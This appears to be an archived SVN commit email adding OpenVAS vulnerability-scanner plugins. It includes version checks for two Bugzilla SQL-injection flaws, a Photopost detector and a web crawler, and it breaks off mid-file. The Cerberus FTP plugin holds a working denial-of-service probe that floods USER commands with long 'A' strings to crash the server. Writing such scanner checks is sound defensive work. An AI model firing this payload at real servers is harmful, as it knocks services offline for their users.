[Openvas-commits] r5358 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Fri Oct 2 19:48:18 CEST 2009


Author: mime
Date: 2009-10-02 19:48:14 +0200 (Fri, 02 Oct 2009)
New Revision: 5358

Added:
   trunk/openvas-plugins/scripts/bugzilla_36371.nasl
   trunk/openvas-plugins/scripts/bugzilla_36373.nasl
   trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
   trunk/openvas-plugins/scripts/photopost_detect.nasl
   trunk/openvas-plugins/scripts/webmirror.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
   trunk/openvas-plugins/scripts/misc_func.inc
   trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl
   trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl
   trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl
Log:
Added new plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/ChangeLog	2009-10-02 17:48:14 UTC (rev 5358)
@@ -1,3 +1,20 @@
+2009-10-02  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/photopost_detect.nasl,
+	scripts/bugzilla_36373.nasl,
+	scripts/cerberus_ftp_server_36390.nasl,
+	scripts/bugzilla_36371.nasl,
+	scripts/webmirror.nasl:
+	Added new plugins.
+
+	* scripts/sambar_cgi_path_disclosure.nasl,
+	scripts/ypupdated_remote_exec.nasl,
+	scripts/secpod_surgemail_detect.nasl:
+	Bugfixes.
+
+	* scripts/misc_func.inc:
+	Added function get_unknown_svc().
+
 2009-10-01  Thomas Reinke <reinke at securityspace.com>
 	* scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl:
 	Fix typo.

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-02 17:48:14 UTC (rev 5358)
@@ -99,3 +99,6 @@
 36554                           Greenbone       svn             R
 36490                           Greenbone       svn             R
 CVE-2009-3103                   Greenbone       svn             R
+CVE-2009-3125                   Greenbone       svn             R
+36390                           Greenbone       svn             R
+CVE-2009-3165                   Greenbone       svn             R

Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl
===================================================================
--- trunk/openvas-plugins/scripts/bugzilla_36371.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/bugzilla_36371.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100286);
+ script_bugtraq_id(36371);
+ script_cve_id("CVE-2009-3125");
+ script_version ("1.0-$Revision$");
+
+ script_name("Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability");
+
+desc = "Overview:
+Bugzilla is prone to an SQL-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data before using it in an SQL
+query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+The following versions are affected:
+
+Bugzilla 3.3.2 through 3.4.1 Bugzilla 3.5
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36371
+https://bugzilla.mozilla.org/show_bug.cgi?id=515191
+http://www.bugzilla.org/security/3.0.8/
+http://www.bugzilla.org
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("bugzilla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0);
+
+if(!isnull(version) && version >!< "unknown") {
+
+  if(version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") ||
+     version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") ||
+     version_is_equal(version:version, test_version:"3.5")) {
+      security_warning(port:port);
+      exit(0);
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/bugzilla_36371.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/bugzilla_36373.nasl
===================================================================
--- trunk/openvas-plugins/scripts/bugzilla_36373.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/bugzilla_36373.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100287);
+ script_bugtraq_id(36373);
+ script_cve_id("CVE-2009-3165");
+ script_version ("1.0-$Revision$");
+
+ script_name("Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability");
+
+desc = "Overview:
+Bugzilla is prone to an SQL-injection vulnerability because it fails
+to sufficiently sanitize user-supplied data before using it in an SQL
+query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+The following versions are vulnerable:
+
+Bugzilla 2.23.4 through 3.0.8 Bugzilla 3.1.1 through 3.2.4 Bugzilla
+3.3.1 through 3.4.1
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/36373
+https://bugzilla.mozilla.org/show_bug.cgi?id=515191
+http://www.bugzilla.org/security/3.0.8/
+http://www.bugzilla.org
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("bugzilla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0);
+if(!isnull(version) && version >!< "unknown") {
+
+  if(
+     version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1")   ||
+     version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4")   ||
+     version_in_range(version:version, test_version:"3.2", test_version2:"3.2.4")   ||
+     version_in_range(version:version, test_version:"3.1", test_version2:"3.1.4")   ||
+     version_in_range(version:version, test_version:"3.0", test_version2:"3.0.8")   ||
+     version_in_range(version:version, test_version:"2.23", test_version2:"2.23.4") ||
+     version_in_range(version:version, test_version:"2.4", test_version2:"2.9")) {
+      security_warning(port:port);
+      exit(0);
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/bugzilla_36373.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,115 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Cerberus FTP Server Long Command Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100284);
+ script_bugtraq_id(36390);
+ script_version ("1.0-$Revision$");
+
+ script_name("Cerberus FTP Server Long Command Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Cerberus FTP Server is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to terminate the affected
+application, denying service to legitimate users.
+
+This issue affects Cerberus FTP Server 3.0.3 through 3.0.6; other
+versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36390
+http://www.cerberusftp.com/index.html
+http://www.securityfocus.com/archive/1/506858
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Cerberus FTP Server is prone to a	denial-of-service vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("FTP");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+if(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0);
+
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+if(!banner = get_ftp_banner(port:ftpPort))exit(0);
+
+if("Cerberus" >!< banner)exit(0);
+
+soc1 = open_sock_tcp(ftpPort);
+soc2 = open_sock_tcp(ftpPort);
+soc3 = open_sock_tcp(ftpPort);
+soc4 = open_sock_tcp(ftpPort);
+
+if(!soc1 || !soc2 || !soc3 || !soc4){
+  exit(0);
+}
+
+req1 = string("USER ", crap(data: raw_string(0x41), length: 330), "\r\n");
+req2 = string("USER ", crap(data: raw_string(0x41), length: 520), "\r\n"); 
+req3 = string("USER ", crap(data: raw_string(0x41), length: 2230), "\r\n");
+
+send(socket:soc1, data:req1);
+send(socket:soc2, data:req2);
+send(socket:soc3, data:req3);
+send(socket:soc4, data:req1);
+
+close(soc1);
+close(soc2);
+close(soc3);
+close(soc4);
+
+sleep(3);
+
+soc = open_sock_tcp(ftpPort);
+
+if(!ftp_recv_line(socket: soc)) {
+   security_warning(port:ftpPort);
+   if(soc)close(soc);
+   exit(0);
+}   
+
+if(soc)close(soc);
+
+exit(0); 


Property changes on: trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/misc_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/misc_func.inc	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/misc_func.inc	2009-10-02 17:48:14 UTC (rev 5358)
@@ -3,6 +3,27 @@
 # (C) 2002 Michel Arboi <arboi at alussinan.org>
 # $Revision: 1.53 $
 
+function get_unknown_svc()
+ {
+
+   local_var port;
+  
+   if(!isnull(_FCT_ANON_ARGS[0])) {
+     port = _FCT_ANON_ARGS[0];
+   } else {
+     port = get_kb_item("Services/unknown");
+   } 
+
+   if(!port)return 0;
+   if (port == 139)return 0;
+
+   if(service_is_unknown(port:port)) {
+    return port;
+   }  else {
+    return 0;
+   }  
+ }     
+
 function register_service(port, proto, ipproto)
 {
   local_var	k;

Added: trunk/openvas-plugins/scripts/photopost_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/photopost_detect.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/photopost_detect.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Photopost Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running Photopost, a photo sharing gallery software.
+
+See also:
+http://www.photopost.com/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100285);
+ script_version ("1.0-$Revision$");
+
+ script_name("Photopost Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of Photopost");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/photopost","/photos","/gallery",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "<a [^>]+>Photo Sharing Gallery by PhotoPost", string: buf, icase: TRUE) &&
+    egrep(pattern: "Copyright.*All Enthusiast, Inc", string: buf, icase: TRUE)
+   )
+ {
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+
+    set_kb_item(name: string("www/", port, "/photopost"), value: string(vers," under ",install));
+
+    info = string("None\n\nPhotoPost Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/photopost_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -68,7 +68,7 @@
     req = http_get(port: port, item: strcat(dir, "/", fil));
     r = http_keepalive_send_recv(port:port, data: req);
     p = strcat("SCRIPT_FILENAME:*", fil);
-    if (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[ \t]*[A-Z]\\\\')
+    if (r && (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[\t]*[A-Z]\\\\'))
     {
       security_warning(port);
       exit(0);

Modified: trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -87,8 +87,8 @@
   exit(0);
 }
 
-sndReq = http_get(item:"/", port:surge_port);
-rcvRes = http_send_recv(port:surge_port, data:sndReq);
+sndReq = http_get(item:"/", port:surgemail_port);
+rcvRes = http_send_recv(port:surgemail_port, data:sndReq);
 
 if(egrep(pattern:"SurgeMail", string:rcvRes, icase:1))
 {

Added: trunk/openvas-plugins/scripts/webmirror.nasl
===================================================================
--- trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -0,0 +1,1200 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WEBMIRROR 2.0
+#
+# Saved from
+# http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl
+#
+# Authors:
+# Renaud Deraison <deraison at nessus.org>. 
+#
+# includes some code by H D Moore <hdmoore at digitaldefense.net>
+#
+# Modified by Michael Meyer <michael.meyer at intevation.de>
+#
+# Copyright:
+# Copyright (c) 2001 - 2003 Renaud Deraison
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(10662);
+ script_version("$Revision$");
+ script_name("Web mirroring");
+ 
+ desc = "
+This script makes a mirror of the remote web site(s)
+and extracts the list of CGIs that are used by the remote
+host.
+
+It is suggested you give a high timeout value to
+this plugin and that you change the number of
+pages to mirror in the 'Options' section of
+the client.
+
+Risk factor : None";
+
+ script_description(desc);
+ script_summary("Performs a quick web mirror");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("This script is Copyright (C) 2001 - 2003 Renaud Deraison");
+ script_family("Web application abuses");
+ script_dependencie("find_service.nes", "httpver.nasl", "DDI_Directory_Scanner.nasl");
+ script_require_ports("Services/www", 80);
+ script_add_preference(name:"Number of pages to mirror : ",
+ 			type:"entry",
+			value:"200");
+ script_add_preference(name:"Start page : ",
+ 			type:"entry",
+			value:"/");			
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+
+#-------------------------------------------------------------------------#
+function my_http_recv(socket)
+{
+  local_var	h, b, l;
+ 
+  h = http_recv_headers2(socket:socket);
+  if(!h)return(NULL);
+  
+  if("Content-Type" >< h)
+  {
+   if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:h))return(h);
+  }
+  
+  b = http_recv_body(socket: socket, headers: h, length:0);
+  return (string(h, "\r\n", b));
+}
+
+
+
+function my_http_keepalive_recv()
+{
+  local_var headers, body, length, tmp, chunked, killme;
+
+  killme = 0;
+  length = -1;
+  headers = http_recv_headers2(socket:__ka_socket);
+  if(strlen(headers) == 0)headers = http_recv_headers2(socket:__ka_socket);
+  
+  if(ereg(pattern:"^HEAD.*HTTP/.*", string:__ka_last_request))
+   {
+   # HEAD does not return a body
+   return(headers);
+   }
+  
+  if("Content-Type" >< headers)
+  {
+   if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:headers))
+   	{
+	 http_close_socket(__ka_socket);
+	 __ka_socket = 0;
+	 return(headers);
+	}
+  }
+  
+  if("Content-Length" >< headers)
+  {
+    tmp = egrep(string:headers, pattern:"^Content-Length: [0-9]*");
+    length = int(ereg_replace(string:tmp, pattern:"^Content-Length: ([0-9]*)", replace:"\1"));
+  }
+  
+ 
+
+ if((length < 0) && (egrep(pattern:"transfer-encoding: chunked", string:headers, icase:TRUE)))
+ {
+   while(1)
+   {
+   tmp = recv_line(socket:__ka_socket, length:4096);
+   length = hex2dec(xvalue:tmp);
+   if(length > 512*1024)
+   	{
+   	length = 512*1024;
+	killme = 1;
+	}
+   body  = string(body, recv(socket:__ka_socket, length:length+2, min:length+2));
+   if(strlen(body) > 512*1024)killme = 1;
+   
+   if(length == 0 || killme){
+   	http_keepalive_check_connection(headers:headers);
+   	return(string(headers,"\r\n", body)); # This is expected - don't put this line before the previous
+	}
+   }
+ }
+ 
+
+ if(length >= 0)
+ {
+   if(length > 512*1024)length = 512*1024;
+   
+   body = recv(socket:__ka_socket, length:length, min:length);
+ }
+ else {
+ 	# If we don't have the length, we close the connection to make sure
+	# the next request won't mix up the replies.
+	
+ 	#display("ERROR - Keep Alive, but no length!!!\n", __ka_last_request);
+	body = recv(socket:__ka_socket, length:16384);
+	http_close_socket(__ka_socket);
+	__ka_socket =  http_open_socket(__ka_port);
+	}
+
+ 
+
+ http_keepalive_check_connection(headers:headers);
+ return(string(headers,"\r\n", body));
+}
+
+
+
+function my_http_keepalive_send_recv(port, data)
+{
+  local_var id, n;
+  
+  if(data == NULL)
+   return;
+
+  if(__ka_enabled == -1)__ka_enabled = http_keepalive_enabled(port:port);
+
+
+
+  if(__ka_enabled == 0)
+  {
+    local_var soc, r;
+    soc = http_open_socket(port);
+    if(!soc)return NULL;
+    send(socket:soc, data:data);
+    r = my_http_recv(socket:soc);
+    http_close_socket(soc);
+    return r;
+  }
+
+
+  if((port != __ka_port)||(!__ka_socket))
+  {
+    if(__ka_socket)http_close_socket(__ka_socket);
+    __ka_port = port;
+    __ka_socket =  http_open_socket(port);
+    if(!__ka_socket)return NULL;
+  }
+
+  id = stridx(data, string("\r\n\r\n"));
+  data = str_replace(string:data, find:"Connection: Close", replace:"Connection: Keep-Alive", count:1);
+  __ka_last_request = data;
+  n = send(socket:__ka_socket, data:data);
+  if(n <= 0)
+  {
+    http_close_socket(__ka_socket);
+    __ka_socket = http_open_socket(__ka_port);
+    if(__ka_socket == 0)return NULL;
+    send(socket:__ka_socket, data:data);
+  }
+
+  return(my_http_keepalive_recv());
+}
+
+#-------------------------------------------------------------------#
+
+
+function add_cgi_dir(dir)
+{
+ local_var d, dirs, req, res;
+
+ if ( num_cgi_dirs > max_cgi_dirs ) return 0;
+ 
+ req = http_get(item:string(dir, "/non-existant-", rand()), port:port);
+ req = my_http_keepalive_send_recv(port:port, data:req);
+ if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 404 ", string:req))
+ {
+  dirs = cgi_dirs();
+  foreach d (dirs)
+  {
+  if(d == dir)return(0);
+  }
+ 
+  if(isnull(CGI_Dirs_List[dir]))
+  {
+   #display(CGI_Dirs_List[dir], "\n");
+   set_kb_item(name:"/tmp/cgibin", value:dir);
+   CGI_Dirs_List[dir] = 1;
+   num_cgi_dirs ++;
+  }
+ }
+}
+
+
+#--------------------------------------------------------------------------#
+
+function add_30x(url)
+{
+ if(isnull(URLs_30x_hash[url]))
+ {
+  set_kb_item(name:string("www/", port, "/content/30x"), value:url);
+  URLs_30x_hash[url] = 1;
+ }
+}
+
+
+function add_auth(url)
+{
+ if(isnull(URLs_auth_hash[url]))
+ {
+  set_kb_item(name:string("www/", port, "/content/auth_required"), value:url);
+  URLs_auth_hash[url] = 1;
+  if(url == "/")RootPasswordProtected = 1;
+ }
+}
+
+#--------------------------------------------------------------------------#
+
+num_url = 0;
+
+function add_url(url)
+{
+ local_var ext, dir;
+  
+ if ( num_url > 100 ) return 0;
+ 
+ if(debug > 5)display("**** ADD URL ", url, "\n");
+ if(isnull(URLs_hash[url]))
+ {
+  URLs = make_list(URLs, url);
+  URLs_hash[url] = 0;
+   
+  url = ereg_replace(string:url,
+  			pattern:"(.*)\?.*",
+			replace:"\1");
+			
+			
+  ext = ereg_replace(pattern:".*\.([^\.]*)$", string:url, replace:"\1");
+  if(strlen(ext) && ext[0] != "/")
+  {
+   set_kb_item(name:string("www/", port, "/content/extensions/", ext), value:url);
+  }
+  
+  dir = dir(url:url);
+  if(dir && !Dirs[dir])
+  {
+   Dirs[dir] = 1;
+   set_kb_item(name:string("www/", port, "/content/directories"), value:dir);
+   if(isnull(URLs_hash[dir]))
+   {
+    URLs = make_list(URLs, dir);
+    if(Apache)URLs  = make_list(URLs,  string(dir, "/?D=A"));
+    else if(iPlanet)URLs = make_list(URLs,  string(dir, "/?PageServices"));
+    URLs_hash[dir] =  0;
+   }
+  }
+ }
+}
+
+function cgi2hash(cgi)
+{
+ local_var cur_cgi, cur_arg, i, ret;
+ 
+ ret = make_list();
+ 
+ for(i=0;i<strlen(cgi);i++)
+ {
+  if(cgi[i] == " " && cgi[i+1] == "[")
+  {
+    cur_arg = "";
+    for(i=i+2;i<strlen(cgi);i++)
+    {
+      if(cgi[i] == "]")
+      {
+        ret[cur_cgi] = cur_arg;
+	cur_cgi = "";
+	cur_arg = "";
+	if(i + 2 >= strlen(cgi))return ret;
+	i += 2;
+	break;
+      }
+      else cur_arg += cgi[i];
+    }
+  }
+  cur_cgi += cgi[i];
+ } 
+ return ret;
+}
+
+function hash2cgi(hash)
+{
+ local_var ret, h;
+ 
+ ret = "";
+ foreach h (keys(hash))
+ {
+  ret += string(h, " [", hash[h], "] ");
+ }
+ return ret;
+}
+
+
+function add_cgi(cgi, args)
+{
+ local_var mydir, tmp, a, new_args, common, c;
+ 
+ args = string(args);
+
+ if(isnull(CGIs[cgi]))
+ {
+  CGIs[cgi] = args;
+  mydir = dir(url:cgi);
+  if(!CGIsDirs[mydir])
+  {
+   CGIsDirs[mydir] = 1;
+   add_cgi_dir(dir:mydir);
+  }
+ }
+ else {
+    tmp = cgi2hash(cgi:CGIs[cgi]);
+    new_args = cgi2hash(cgi:args);
+    common = make_list();
+    foreach c (keys(tmp))
+    {
+     common[c] = tmp[c];
+    }
+    
+    foreach c (keys(new_args))
+    {
+     if(isnull(common[c]))common[c] = new_args[c];
+    }
+    CGIs[cgi] = hash2cgi(hash:common);
+    }
+}
+
+
+
+#---------------------------------------------------------------------------#
+
+function dir(url)
+{
+ return ereg_replace(pattern:"(.*)/[^/]*", string:url, replace:"\1");
+}
+
+function remove_cgi_arguments(url)
+{
+ local_var idx, cgi, cgi_args, args, arg, a, b;
+ 
+ # Remove the trailing blanks
+ while(url[strlen(url) - 1] == " ")
+ {
+  url = substr(url, 0, strlen(url) - 2);
+ }
+ 
+ idx = stridx(url, "?");
+ if(idx < 0)
+  return url;
+ else if(idx >= strlen(url) - 1)
+ {
+  cgi = substr(url, 0, strlen(url) - 2);
+  add_cgi(cgi:cgi, args:"");
+  return cgi;
+ }
+ else
+ {
+  if(idx > 1)cgi = substr(url, 0, idx - 1);
+  else cgi = ".";
+  cgi_args = split(substr(url, idx + 1, strlen(url) - 1), sep:"&");
+  foreach arg (make_list(cgi_args)) 
+  {
+   arg = arg - "&";
+   arg = arg - "amp;";
+   a = ereg_replace(string:arg, pattern:"(.*)=.*", replace:"\1");
+   b = ereg_replace(string:arg, pattern:".*=(.*)", replace:"\1");
+   if(a != b)
+  	 args = string(args, a , " [", b, "] ");
+   else
+   	 args = string(args, arg, " [] ");
+  }
+  add_cgi(cgi:cgi, args:args);
+  return cgi;
+ }
+}
+
+
+function basename(name, level)
+{
+ local_var i;
+ 
+ if(strlen(name) == 0)
+  return NULL;
+  
+
+  for(i = strlen(name) - 1; i >= 0 ; i --)
+  {
+   if(name[i] == "/")
+   {
+    level --;
+    if(level < 0)
+    { 
+     return(substr(name, 0, i));
+    }
+   }
+ }
+ 
+ # Level is too high, we return /
+ return "/";
+}
+
+
+
+function canonical_url(url, current)
+{
+ local_var num_dots, i, location ;
+ 
+#debug = int(5);
+ 
+ if(debug > 1)display("***** canonical '", url, "' (current:", current, ")\n");
+ 
+ if(strlen(url) == 0)
+  return NULL;
+  
+ if(url[0] == "#")
+  return NULL;
+ 
+ 
+ if(url == "./" || url == ".")
+   return current;
+  
+
+ if(debug > 2)display("**** canonical(again) ", url, "\n");
+ 
+ if(ereg(pattern:"[a-z]*:", string:url, icase:TRUE))
+ {
+  if(ereg(pattern:"^http://", string:url, icase:TRUE))
+  {
+   location = ereg_replace(string:url, pattern:"http://([^/]*)/.*", replace:"\1", icase:TRUE);
+   if(location != url)
+   {
+    if(location != get_host_name())return NULL;
